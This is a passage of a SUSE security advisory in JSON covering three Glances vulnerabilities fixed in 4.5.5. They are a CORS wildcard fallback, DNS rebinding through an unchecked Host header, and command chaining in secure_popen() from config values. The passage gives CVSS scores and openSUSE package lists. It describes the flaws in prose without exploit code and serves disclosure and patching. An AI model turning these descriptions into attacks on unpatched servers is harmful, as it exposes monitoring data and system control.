"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim\u0027s knowledge. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46608",
"url": "https://www.suse.com/security/cve/CVE-2026-46608"
},
{
"category": "external",
"summary": "SUSE Bug 1268855 for CVE-2026-46608",
"url": "https://bugzilla.suse.com/1268855"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46608"
},
{
"cve": "CVE-2026-46611",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46611"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim\u0027s browser. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46611",
"url": "https://www.suse.com/security/cve/CVE-2026-46611"
},
{
"category": "external",
"summary": "SUSE Bug 1268856 for CVE-2026-46611",
"url": "https://bugzilla.suse.com/1268856"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-46611"
},
{
"cve": "CVE-2026-53925",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-53925"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source, cross-platform system monitoring tool. From 4.0.8 until 4.5.5, the secure_popen() function in glances/secure.py interprets \u003e (file redirection), | (pipe), and \u0026\u0026 (command chaining) operators in command strings. These operators are applied without any validation of the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via \u003e), chain arbitrary commands (via \u0026\u0026), or pipe command output to arbitrary programs (via |). This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-53925",
"url": "https://www.suse.com/security/cve/CVE-2026-53925"
},
{
"category": "external",
"summary": "SUSE Bug 1268984 for CVE-2026-53925",
"url": "https://bugzilla.suse.com/1268984"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update, use the SUSE recommended installation methods such as YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-53925"
}
]
}